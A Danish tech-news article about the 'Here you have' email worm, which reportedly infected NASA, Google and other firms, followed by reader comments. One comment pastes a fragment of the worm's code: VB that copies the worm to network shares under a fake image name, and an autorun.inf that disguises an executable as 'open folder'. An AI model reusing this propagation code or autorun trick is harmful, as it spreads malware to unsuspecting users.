Retro-malware: E-mail-orm skaber ravage hos Google og Nasa

En orm, der formerer sig via e-mail, spreder sig som en steppebrand i disse dage, selvom den slags malware slet ikke er på mode længere. Nasa, Google og Coca-cola er ramt.

Står der 'Here you have' i emne-linjen på en af dagens e-mails, så hold dig på lang afstand.

Det er nemlig sådan en ny e-mail-orm præsenterer sig selv, sammen med en opfordring til at åbne den vedhæftede fil, der ligner en PDF-fil, men er en ondsindet SCR-fil. Det skriver V3.co.uk.

Orme via e-mail var kendt og frygtet tilbage i 1999 og de følgende år, hvor den mest berømte var 'I love you'-ormen, men er i dag typisk afløst af andre metoder.

Men retro-idéen har tilsyneladende virket for bagmændene, for mindst 60.000 maskiner meldes inficeret i USA, herunder netværk hos store firmaer som Disney, Coca-cola, Google og Nasa.

Spredning via e-mail, hvor malwaren sender beskeden videre til alle andre i adressekartoteket, bliver dog også suppleret af andre metoder som kopiering til USB-nøgler som en autorun-fil.

Klikker man på den vedhæftede fil eller bliver smittet via USB-nøgle, installerer malwaren filen CSRSS.exe, som så begynder at hente andre værktøjer ned. Desuden vil malwaren forsøge at slukke for al antivirus på maskinen.

E-mail-orme gik af mode, fordi det blev nemt for antivirusfirmaerne at opdage dem, på grund af den store mængde e-mail-trafik, ormene genererer. Også denne orm skulle nu være gennemskuet af antivirusfirmaerne, så de kan blokere for dens indtrængen.

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Kommentarer (7)
sortSortér kommentarer
  • Ældste først
  • Nyeste først
  • Bedste først
Dennis Rilorin

Såvidt jeg kan tyde ud fra artiklen er her tale om en virus / malware der installerer en .exe-fil. Det vil naturligvis sige at det skal afvikles på en Windows-maskine for at gøre nogen skade, men jeg er af den opfattelse at Google overhovedet ikke kører Windows noget sted i deres organisation. Derfor mener jeg at Google ikke kan være ramt af virussen.

Er der nogen der kan be- eller afkræfte om Google er en 100% no-Windows-virksomhed?

  • 0
  • 0
Michael Degn

@Jacob

Det har du ret i. Dog er det ikke ligegyldig hvorfra processen kører. Den legitime csrss.exe befinder sig i :\Windows\System32\

F.eks. er der malwaren BuildLabs som også kører csrss.exe - men denne fra :\Windows\System\

  • 0
  • 0
Peter Kruse

Hey,

Dette er blot en lille del af den massive payload der kommer med denne orm. Den spreder sig også via interne ressourcer og downloader talrige legitime værktøjer der bruges til at udtrække brugernavne og passwords fra forskellige kilder, herunder RDS, IE, FF, Chrome osv.

En central del af koden findes herunder:

on error resume next Dim domain Dim computer Set domain = GetObject("WinNT://Workgroup") domain.Filter = Array("Computer") For Each computer In domain strComp = computer.Name DoEvents FileCopy App.Path & "\svchost.exe", "\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr" FileCopy App.Path & "\svchost.exe", "\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr" Next Text4 [autorun] open=open.exe icon=%SystemRoot%\system32\SHELL32.dll,4 action=Open folder to view files shell\open=Open shell\open\command=open.exe shell\open\default=1

/Peter

  • 0
  • 0
Log ind eller Opret konto for at kommentere